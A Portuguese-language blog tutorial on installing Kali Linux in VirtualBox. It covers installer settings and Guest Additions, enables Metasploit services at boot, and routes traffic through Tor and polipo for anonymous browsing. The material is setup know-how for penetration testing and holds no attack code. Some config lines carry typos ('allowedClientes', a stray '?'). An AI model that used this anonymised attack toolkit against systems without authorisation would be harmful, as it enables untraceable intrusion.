Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.
Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site
2 – Instalar o Kali Linux
Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”
Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhor
Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo
Defina a senha do usuário Root
Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar
Nessa tela, podemos selecionar a primeira opção e avançar
Podemos avançar, e na próxima tela selecionar “YES”
Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.
Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar
Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.
3 – Configurações iniciais.
O primeiro passo é instalar o VBOX Additions para isso faça o seguinte abra um terminal e digite:
apt-get update && apt-get install -y linux-headers-$(uname -r)
Aguarde a conclusão da instalação
Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”
Quando for exibido essa tela, clique em cancelar
Execute agora os seguintes comandos no terminal.
cp /media/cdrom0/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
Aguarde a conclusão da instalação e reinicie a VM
Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:
service postgresql start && service metasploit start
aguarde a conclusão e depois digite:
update-rc.d postgresql enable && update-rc.d metasploit enable
Para iniciar basta acessar conforme a imagem
Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:
apt-get install tor tor-geoipdb polipo vidalia
Feito isso digite
mkdir /var/run/tor
chmod 700 /var/run/tor/
Vamos configurar o polipo para acessar através do tor para isso digite
vim /etc/polipo/config
Descomente as linhas
allowedClientes 127.0.0.1
socksParentProxy = “localhost:9050?
socksParentType = socks5
salve e saia do arquivo e digite
service tor restart
service polipo restart
Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050
Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy
Para instalar o EtherApe basta digitar
apt-get install etherape
Aguarde a conclusão e ele vai estar disponível em Applications/Internet.
Agora, caso queira, basta ler nossa série de tutorias para pentest usando Kali Linux disponível do link abaixo
Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar
Até a próxima
0
comentários
Marcadores:
Kali Linux
Assinar:
Comentários (Atom)














